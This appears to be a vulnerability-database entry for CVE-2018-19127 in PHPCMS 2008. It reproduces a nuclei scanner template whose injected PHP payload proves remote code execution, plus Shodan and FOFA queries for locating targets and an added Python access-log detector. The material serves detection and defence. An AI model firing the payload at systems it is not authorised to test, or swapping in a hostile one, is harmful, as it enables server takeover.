
PHPCMS 2008 - Remote Code Execution via Template Injection

02 Jul 2026 09:36:57 | Reported by ProjectDiscovery | Type: nuclei | github.com

Unauthenticated remote code execution in PHPCMS 2008 via template injection: attacker-supplied content is written to a PHP template cache file, which is then executed.

Related
Reporter | Title | Published | Family
Circl | CVE-2018-19127 | 22 Aug 2025 21:02 | circl
CNVD | PHPCMS Code Injection Vulnerability | 13 Nov 2018 00:00 | cnvd
Check Point Advisories | PHPCMS 2008 type.php Code Injection (CVE-2018-19127) | 27 Mar 2019 00:00 | checkpoint_advisories
CVE | CVE-2018-19127 | 9 Nov 2018 12:00 | cve
Cvelist | CVE-2018-19127 | 9 Nov 2018 12:00 | cvelist
NVD | CVE-2018-19127 | 9 Nov 2018 12:29 | nvd
OSV | CVE-2018-19127 | 9 Nov 2018 12:29 | osv
Prion | Code injection | 9 Nov 2018 12:29 | prion
VulnCheck KEV | VulnCheck KEV: CVE-2018-19127 | 4 Apr 2019 00:00 | vulncheck_kev

id: CVE-2018-19127

info:
  name: PHPCMS 2008 - Remote Code Execution via Template Injection
  author: tomaquet18
  severity: critical
  description: |
    PHPCMS 2008 suffers from an unauthenticated RCE via template injection in type.php, where attacker-supplied content is written into a PHP template cache file, which is then executable.
  impact: |
    Successful exploitation allows an unauthenticated attacker to achieve remote code execution on the server, potentially taking full control.
  remediation: |
    The vendor is unresponsive and PHPCMS 2008 is no longer maintained. Users are advised to stop using this software or restrict public access to it.
  reference:
    - https://github.com/ab1gale/phpcms-2008-CVE-2018-19127
    - https://github.com/advisories/GHSA-p498-q357-m3p7
    - https://nvd.nist.gov/vuln/detail/CVE-2018-19127
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2018-19127
    epss-score: 0.20766
    epss-percentile: 0.97228
    cwe-id: CWE-94
    cpe: cpe:2.3:a:phpcms:phpcms:2008:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    shodan-query: http.html:"Powered by phpcms"
    fofa-query: body="Powered by phpcms"
    vendor: phpcms
    product: phpcms-2008
  tags: cve,cve2018,phpcms,rce,ssti,vkev,vuln

flow: http(1) || http(2)

variables:
  num: "999999999"
  payload: "tag_(){};echo(md5({{num}}));{//../rss"

http:
  - method: GET
    path:
      - "{{BaseURL}}/type.php?template={{payload}}"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body, "value=\"picture", "phpcms", "{{md5(num)}}")'
        condition: and
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/data/cache_template/rss.tpl.php"

    matchers:
      - type: word
        words:
          - "{{md5(num)}}"
# digest: 490a00463044022031e2bcd2694b2962d1a829b27da35526068d87970b1a48554dcd3c9b8e3c204302202b213df81b1cde212cabf8df50ef8568af668cc5db86e8ea8f551bebf2fe17ed:922c64590222798bb761d5b6d8e72950
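
For defenders who cannot retire the application immediately, the two requests in the template above map to two access-log signals: a `type.php` request whose `template` parameter is not a plain name, and a direct request for a compiled file under `data/cache_template/` that the server actually serves. The following is an added example, not part of the nuclei template or ProjectDiscovery's code; the combined-log layout, the safe-name pattern and the sample lines are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Combined-log style line: client IP first, then "METHOD target HTTP/x" and the status.
LOG_RE = re.compile(r'^(?P<ip>\S+) .*?"[A-Z]+ (?P<target>\S+) [^"]*" (?P<status>\d{3})')
# Assumption: legitimate template names are plain identifiers; anything else is flagged.
SAFE_TEMPLATE = re.compile(r'^[A-Za-z0-9_-]+$')
# Compiled template cache files should never be requested directly by a client.
CACHE_PATH = re.compile(r'/data/cache_template/[^/]+\.tpl\.php$')

def classify(line):
    """Return (client_ip, finding) for a suspicious log line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m["target"])
    if url.path.endswith("/type.php"):
        # parse_qs percent-decodes values, so encoded input is checked in clear form.
        for value in parse_qs(url.query).get("template", []):
            if not SAFE_TEMPLATE.match(value):
                return m["ip"], "template-injection-attempt"
    if CACHE_PATH.search(url.path) and m["status"] == "200":
        return m["ip"], "cache-template-served"
    return None

def scan(lines):
    """Group findings per client IP, preserving log order."""
    findings = {}
    for line in lines:
        hit = classify(line)
        if hit:
            findings.setdefault(hit[0], []).append(hit[1])
    return findings

# Constructed sample lines (documentation IP ranges), not taken from a real server.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /type.php?template='
    'tag_%28%29%7B%7D%3Becho%28md5%28999999999%29%29%3B%7B%2F%2F..%2Frss HTTP/1.1" 200 5120',
    '203.0.113.7 - - [01/Jan/2024:10:00:01 +0000] "GET /data/cache_template/rss.tpl.php HTTP/1.1" 200 32',
    '198.51.100.20 - - [01/Jan/2024:10:05:00 +0000] "GET /type.php?template=type HTTP/1.1" 200 4800',
    '198.51.100.20 - - [01/Jan/2024:10:05:02 +0000] "GET /data/cache_template/rss.tpl.php HTTP/1.1" 403 199',
]

if __name__ == "__main__":
    for ip, hits in scan(SAMPLE_LOG).items():
        print(ip, hits)
```

A `cache-template-served` finding means the web server still hands out files from the cache directory; denying direct access to that path is one way to apply the "restrict public access" remediation.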


04 Feb 2026 07:00 (current)
Vulners AI Score: 7.3 (High risk)
CVSS 2: 7.5
CVSS 3: 9.8
EPSS: 0.20766